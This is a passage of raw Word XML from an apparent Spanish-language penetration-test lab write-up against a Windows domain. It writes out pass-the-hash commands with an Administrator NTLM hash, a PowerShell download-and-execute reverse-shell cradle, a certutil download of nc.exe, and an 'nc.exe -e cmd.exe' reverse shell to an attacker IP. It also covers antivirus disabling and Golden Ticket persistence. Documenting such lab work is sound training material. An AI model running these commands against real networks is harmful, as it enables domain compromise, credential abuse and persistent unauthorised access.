      </w:r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 aad3b435b51404eeaad3b435b51404ee:b72f3db8c9e58fbb65cd69ebf9c5a236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4B64E89B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>Esta parte contiene el hash NTLM (</w:t>
      </w:r>
      <w:proofErr w:type="spell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>NetLogon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Hash) que se utiliza para la autenticación. El hash NTLM se presenta como una cadena en dos partes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="793C72C6" w14:textId="77777777" w:rsidR="00C66982" w:rsidRPr="008247A7" w:rsidRDefault="00C66982" w:rsidP="008247A7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La primera parte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ad3b435b51404eeaad3b435b51404ee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es un valor estático utilizado en el proceso de hash NTLM.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F0C086C" w14:textId="77777777" w:rsidR="00C66982" w:rsidRPr="008247A7" w:rsidRDefault="00C66982" w:rsidP="008247A7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La segunda parte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72f3db8c9e58fbb65cd69ebf9c5a236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es el hash real de la contraseña de la cuenta </w:t>
      </w:r>
      <w:proofErr w:type="gram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dministrador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.</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="2BABDFB1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>Este hash se utiliza en lugar de la contraseña real para autenticarse sin necesidad de conocer la contraseña en texto claro.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BB15593" w14:textId="77777777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proofErr w:type="gram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 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</w:t>
      </w:r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x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5D2CE528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>Esta opción indica que el siguiente comando se ejecutará en la máquina remota (en este caso, en la máquina con IP 172.16.1.51).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E601A02" w14:textId="77777777" w:rsidR="00C66982" w:rsidRPr="008247A7" w:rsidRDefault="00C66982" w:rsidP="00C669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proofErr w:type="gram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  </w:t>
      </w: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"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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wershell</w:t>
      </w:r>
      <w:proofErr w:type="spell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IEX(New-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bject</w:t>
      </w:r>
      <w:proofErr w:type="spell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Net.WebClient).downloadString('http://172.16.4.63:8080/Invoke-PowerShellTcp.ps1')"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67D27679" w14:textId="77777777" w:rsidR="00C66982" w:rsidRPr="008247A7" w:rsidRDefault="00C66982" w:rsidP="008247A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sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-CO"/>
        </w:rPr>
        <w:t>Este es el comando que se ejecutará en la máquina remota a través de PowerShell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1017DF32" w14:textId="77777777" w:rsidR="00C66982" w:rsidRPr="008247A7" w:rsidRDefault="00C66982" w:rsidP="000F0FE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wershell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>: Inicie un proceso de PowerShell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EDA2F77" w14:textId="77777777" w:rsidR="00C66982" w:rsidRPr="008247A7" w:rsidRDefault="00C66982" w:rsidP="000F0FE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EX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: Es el alias de </w:t>
      </w:r>
      <w:proofErr w:type="spell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>Invoke-Expression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, un </w:t>
      </w:r>
      <w:proofErr w:type="spell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>cmdlet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de PowerShell que ejecuta un comando o script proporcionado como argumento.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="135BF22D" w14:textId="77777777" w:rsidR="00C66982" w:rsidRPr="008247A7" w:rsidRDefault="00C66982" w:rsidP="000F0FE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(New-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bject</w:t>
      </w:r>
      <w:proofErr w:type="spell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et.WebClient</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gram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).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wnloadString</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd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()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: Crea un objeto </w:t>
      </w:r>
      <w:proofErr w:type="spell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WebClient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en PowerShell que se utiliza para descargar el contenido de una URL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49666B42" w14:textId="77777777" w:rsidR="00C66982" w:rsidRPr="008247A7" w:rsidRDefault="00C66982" w:rsidP="000F0FE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CO"/>
        </w:rPr>
      </w:pPr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'http://172.16.4.63:8080/Invoke-PowerShellTcp.ps1'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: La URL desde la que se descargará el script </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008247A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voke-PowerShellTcp.ps1</w:t>
      </w:r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.</w:t>
      </w:r>
      <w:proofErr w:type="gram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Esta es la ubicación de un script PowerShell que puede usarse para establecer una conexión inversa (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008247A7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-CO"/>
        </w:rPr>
        <w:t>shell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008247A7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-CO"/>
        </w:rPr>
        <w:t xml:space="preserve"> inverso) o realizar otras acciones maliciosas en la máquina remota.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B9FBEE1" w14:textId="77777777" w:rsidR="00C66982" w:rsidRPr="008247A7" w:rsidRDefault="00C66982" w:rsidP="008A7103">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23E3E09E" w14:textId="6708049A" w:rsidR="00AD1726" w:rsidRPr="008247A7" w:rsidRDefault="00AD1726" w:rsidP="008A7103">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008247A7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Con </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008247A7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>crackmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008247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47A7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>exec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008247A7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">  accedemos</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008247A7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">  al usuario administrador, al final de la línea agregamos: (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008247A7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>powershell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008247A7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> IEX(New-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008247A7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Object</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008247A7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Net.WebClient).downloadString('http://tuIP:8080/Invoke-PowerShellTcp.ps1) es como si hiciéramos un </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008247A7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>get</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008247A7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> en Linux, sirve para descargar y ejecutar la reverse Shell. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16D8ABF0" w14:textId="27DC8A18" w:rsidR="000B6ACA" w:rsidRDefault="00AD1726" w:rsidP="008A7103">
      <w:r w:rsidRPr="00AD1726">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="460E4CC9" wp14:editId="46BF4B32">
            <wp:extent cx="5760720" cy="2978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82E0" w14:textId="5F853D70" w:rsidR="00AD1726" w:rsidRDefault="00AD1726" w:rsidP="008A7103">
      <w:r>
        <w:t xml:space="preserve">Cabe </w:t>
      </w:r>
      <w:r w:rsidR="00D46679">
        <w:t>aclarar que</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> por obvios motivos debemos tener un server http agregado en el directorio que tenemos el script:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E6D8B17" w14:textId="52874C5E" w:rsidR="00AD1726" w:rsidRDefault="00AD1726" w:rsidP="008A7103">
      <w:r w:rsidRPr="00AD1726">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1302FF99" wp14:editId="751453B7">
            <wp:extent cx="4020111" cy="61921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847F" w14:textId="6A59CC10" w:rsidR="00AD1726" w:rsidRDefault="00AD1726" w:rsidP="008A7103">
      <w:r>
        <w:t>Escuchamos el puerto agregado en la reverse Shell en este caso el 443</w:t>
      </w:r>
      <w:r w:rsidR="00D46679">
        <w:t xml:space="preserve"> y finalmente tenemos nuestra reverse Shell:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33F4BD4F" w14:textId="11F66552" w:rsidR="00AD1726" w:rsidRDefault="00AD1726" w:rsidP="008A7103">
      <w:r w:rsidRPr="00AD1726">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="25FDD809" wp14:editId="1655966E">
            <wp:extent cx="5487166" cy="188621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B6A8" w14:textId="6CA5BC30" w:rsidR="00D46679" w:rsidRDefault="00D46679" w:rsidP="008A7103">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Para comprobar listamos:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D46679">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D46679">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="60047A50" wp14:editId="26D53498">
            <wp:extent cx="5696745" cy="389626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FBF" w14:textId="01193170" w:rsidR="00D46679" w:rsidRDefault="00D46679" w:rsidP="008A7103"/>
    <w:p w14:paraId="3E8A4E1C" w14:textId="0DE9CC45" w:rsidR="00D46679" w:rsidRDefault="00D46679" w:rsidP="008A7103">
      <w:r>
        <w:t>Y comprobamos el usuario, que debería ser administrador:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D4E33F4" w14:textId="443EE02D" w:rsidR="00D46679" w:rsidRDefault="00D46679" w:rsidP="008A7103">
      <w:r w:rsidRPr="00D46679">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3F44618B" wp14:editId="3D5EF7D9">
            <wp:extent cx="2038635" cy="3620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0214" w14:textId="628CAB8C" w:rsidR="00792A69" w:rsidRDefault="00792A69" w:rsidP="008A7103">
      <w:r>
        <w:t xml:space="preserve">Para hacer Pass </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>the</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>ticket  primero</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> deberíamos saber cuál estación de trabajo es accesible, por problemas de red en esta ocasión recurrimos a ingeniería social , debido a problemas de red.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51D69040" w14:textId="2F68BF11" w:rsidR="00EB25F6" w:rsidRDefault="00EB25F6" w:rsidP="008A7103"/>
    <w:p w14:paraId="6076C484" w14:textId="499E08AE" w:rsidR="00EB25F6" w:rsidRDefault="00EB25F6" w:rsidP="008A7103">
      <w:r w:rsidRPr="00EB25F6">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3220EF2E" wp14:editId="3BCE6F30">
            <wp:extent cx="5760720" cy="2357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77D" w14:textId="20DDE8A3" w:rsidR="00792A69" w:rsidRDefault="00792A69" w:rsidP="008A7103">
      <w:r>
        <w:t xml:space="preserve">Con este comando </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>estamos  deshabilitando</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> el an</w:t>
      </w:r>
      <w:r w:rsidR="007A5289">
        <w:t>tivirus en tiempo real.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35D2D55E" w14:textId="3A1F6B3C" w:rsidR="007A5289" w:rsidRDefault="00EB25F6" w:rsidP="008A7103">
      <w:r w:rsidRPr="00EB25F6">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6C4503F3" wp14:editId="58286EBA">
            <wp:extent cx="5760720" cy="1016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BD3A" w14:textId="2C791F29" w:rsidR="007A5289" w:rsidRDefault="007A5289" w:rsidP="008A7103">
      <w:r>
        <w:t xml:space="preserve">Acá se pasa en </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> a la carpeta home para luego pasarlo a la maquina </w:t>
      </w:r>
      <w:r w:rsidR="00F810AE">
        <w:t>victima con</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>crackmapexec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B6D337C" w14:textId="07D1AEDF" w:rsidR="008576BC" w:rsidRDefault="008576BC" w:rsidP="008A7103">
      <w:r w:rsidRPr="008576BC">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6AEAE820" wp14:editId="7C2CEAF3">
            <wp:extent cx="5760720" cy="24606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F084" w14:textId="311DC5DD" w:rsidR="00F810AE" w:rsidRDefault="00F810AE" w:rsidP="008A7103">
      <w:r>
        <w:t>Primero creamos un directorio llamado prueba-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>jessid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, todo esto desde </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>crackmapexec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="122E5889" w14:textId="36333877" w:rsidR="007A5289" w:rsidRDefault="007A5289" w:rsidP="008A7103">
      <w:r>
        <w:t>Subimos un servidor simple http:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CEBAAC5" w14:textId="444C2E01" w:rsidR="00F810AE" w:rsidRDefault="00F810AE" w:rsidP="008A7103">
      <w:r w:rsidRPr="00F810AE">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="398DC45D" wp14:editId="4693FBE4">
            <wp:extent cx="5760720" cy="96139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904" w14:textId="5E3C6D19" w:rsidR="008576BC" w:rsidRDefault="008576BC" w:rsidP="008A7103">
      <w:r w:rsidRPr="008576BC">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4A57D026" wp14:editId="713518CE">
            <wp:extent cx="5760720" cy="41192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52AA" w14:textId="36350D1B" w:rsidR="00F810AE" w:rsidRDefault="00F810AE" w:rsidP="008A7103">
      <w:r>
        <w:t xml:space="preserve">Listamos para </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>comprobar  la</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> creación del directorio.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B7D37EC" w14:textId="166FFD89" w:rsidR="008576BC" w:rsidRDefault="008576BC" w:rsidP="008A7103">
      <w:r w:rsidRPr="008576BC">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="570A6B6C" wp14:editId="29BB6DCC">
            <wp:extent cx="5760720" cy="25704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796" w14:textId="5B9022C1" w:rsidR="00F810AE" w:rsidRDefault="00F810AE" w:rsidP="008A7103">
      <w:r>
        <w:t xml:space="preserve">Descargamos desde nuestro servidor simple http, que subimos desde la maquina atacante, básicamente esto lo que hace es bajar </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> desde la maquina </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>victima</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="615E1CC0" w14:textId="2C449EE0" w:rsidR="008576BC" w:rsidRDefault="008576BC" w:rsidP="008A7103">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008576BC">
        <w:t>crackmapexec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008576BC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008576BC">
        <w:t>smb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008576BC">
        <w:t xml:space="preserve"> 172.16.1.129 -u Administrador -d cs.org -H aad3b435b51404eeaad3b435b51404</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008576BC">
        <w:t>ee:b</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008576BC">
        <w:t>72f3db8c9e58fbb65cd69ebf9c5a236 -x "certutil.exe -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008576BC">
        <w:t>urlcache</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008576BC">
        <w:t xml:space="preserve"> -f http://172.16.4.63:8080/nc.exe C:\prueba-jessid\nc.exe"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E7BEE69" w14:textId="43921AB5" w:rsidR="008576BC" w:rsidRDefault="008576BC" w:rsidP="008A7103">
      <w:r w:rsidRPr="008576BC">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="174476C4" wp14:editId="1755BDE1">
            <wp:extent cx="5760720" cy="35566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E5D" w14:textId="44732FAE" w:rsidR="00F810AE" w:rsidRDefault="00F810AE" w:rsidP="008A7103">
      <w:r>
        <w:t xml:space="preserve">Listamos dentro del directorio y la descarga fue correcta, se descargó </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>nc.exe .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="003E38B3" w14:textId="3A9CC5C6" w:rsidR="008576BC" w:rsidRDefault="008576BC" w:rsidP="008A7103">
      <w:r w:rsidRPr="008576BC">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="46360134" wp14:editId="0A05499F">
            <wp:extent cx="5760720" cy="231775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F303" w14:textId="0E5A8013" w:rsidR="00F810AE" w:rsidRDefault="00F810AE" w:rsidP="008A7103">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Aca</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> se ejecuta el </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> y se abre el </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, lo que generará una </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>resverse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2B5C11AD" w14:textId="11F8F796" w:rsidR="008576BC" w:rsidRDefault="008576BC" w:rsidP="008A7103">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008576BC">
        <w:t>crackmapexec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008576BC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008576BC">
        <w:t>smb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008576BC">
        <w:t xml:space="preserve"> 172.16.1.129 -u Administrador -d cs.org -H aad3b435b51404eeaad3b435b51404</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008576BC">
        <w:t>ee:b</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008576BC">
        <w:t>72f3db8c9e58fbb65cd69ebf9c5a236 -x "C:\prueba-jessid\nc.exe -e cmd.exe 172.16.4.63 4555"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20D6197B" w14:textId="40F000B1" w:rsidR="00CF5E2C" w:rsidRDefault="00CF5E2C" w:rsidP="008A7103">
      <w:r w:rsidRPr="00516364">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7D45715A" wp14:editId="47661AB0">
            <wp:extent cx="5760720" cy="34690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4B16" w14:textId="6F7801F2" w:rsidR="00F810AE" w:rsidRDefault="00F810AE" w:rsidP="008A7103">
      <w:r>
        <w:t xml:space="preserve">Escuchamos desde nuestra maquina atacante y verificamos el funcionamiento </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>de el</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69EF9F8A" w14:textId="28C87070" w:rsidR="00F810AE" w:rsidRDefault="00F810AE" w:rsidP="008A7103"/>
    <w:p w14:paraId="2C8E4378" w14:textId="2B3077F3" w:rsidR="00F810AE" w:rsidRDefault="00F810AE" w:rsidP="008A7103">
      <w:r>
        <w:t xml:space="preserve">Pass </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>the</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> ticket.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D767F30" w14:textId="45FA5371" w:rsidR="00F810AE" w:rsidRDefault="00F810AE" w:rsidP="008A7103"/>
    <w:p w14:paraId="2FF83E5B" w14:textId="77777777" w:rsidR="00F810AE" w:rsidRDefault="00F810AE" w:rsidP="00F810AE">
      <w:r>
        <w:t>Confirmamos que contamos con el hash del usuario Kerberos, responsable de proporcionar los tickets, y procedemos a crear uno.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="617CFD5A" w14:textId="77777777" w:rsidR="00F810AE" w:rsidRDefault="00F810AE" w:rsidP="00F810AE">
      <w:r>
        <w:t>Generar un Golden Ticket: Este ticket alterado permite autenticarse en cualquier recurso del dominio con privilegios de administrador, sin requerir las contraseñas originales.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13104CCD" w14:textId="77777777" w:rsidR="00F810AE" w:rsidRDefault="00F810AE" w:rsidP="00F810AE">
      <w:r>
        <w:t>Brinda acceso persistente: Con este ticket es posible acceder al dominio incluso si se cambian las contraseñas de las cuentas, siempre y cuando el hash de la cuenta KRBTGT permanezca intacto.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F5FEB65" w14:textId="735F058C" w:rsidR="00F810AE" w:rsidRDefault="00F810AE" w:rsidP="00F810AE">
      <w:r>
        <w:t>Almacena el ticket: El archivo generado (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>jessid.kirbi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">) se puede utilizar con herramientas como </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Mimikatz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> para autenticarte en los sistemas del dominio.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2595E76B" w14:textId="02DBBEBB" w:rsidR="00A909A8" w:rsidRDefault="00A909A8" w:rsidP="008A7103"/>
    <w:p w14:paraId="4330AAA8" w14:textId="555B2CC1" w:rsidR="00A909A8" w:rsidRDefault="001C1612" w:rsidP="008A7103">
      <w:r w:rsidRPr="001C1612">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="09538FA4" wp14:editId="65AA67C0">
            <wp:extent cx="5760720" cy="298386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D98E" w14:textId="6F1B7FC9" w:rsidR="001C1612" w:rsidRDefault="001C1612" w:rsidP="008A7103">
      <w:r w:rsidRPr="001C1612">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="63D4DABD" wp14:editId="05858A69">
            <wp:extent cx="5760720" cy="282829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137" w14:textId="0A2CC81D" w:rsidR="001C1612" w:rsidRDefault="001C1612" w:rsidP="008A7103">
      <w:r w:rsidRPr="001C1612">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7587E9E6" wp14:editId="0ECBE288">
            <wp:extent cx="5760720" cy="1522730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C8D" w14:textId="10E96237" w:rsidR="0002556D" w:rsidRDefault="0002556D" w:rsidP="008A7103">
      <w:r w:rsidRPr="0002556D">
        <w:t>Aquí verificamos que creamos el ticket y listamos los recursos compartidos del servidor</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E91DE9B" w14:textId="3D81FCBE" w:rsidR="00A909A8" w:rsidRDefault="00A909A8" w:rsidP="008A7103"/>
    <w:p w14:paraId="6F09382F" w14:textId="4CAF1D7F" w:rsidR="00A909A8" w:rsidRDefault="00A909A8" w:rsidP="008A7103"/>
    <w:p w14:paraId="32FB4411" w14:textId="76535F2A" w:rsidR="008576BC" w:rsidRDefault="008576BC" w:rsidP="008A7103"/>
    <w:p w14:paraId="1E707D58" w14:textId="325B094F" w:rsidR="008576BC" w:rsidRDefault="008576BC" w:rsidP="008A7103"/>
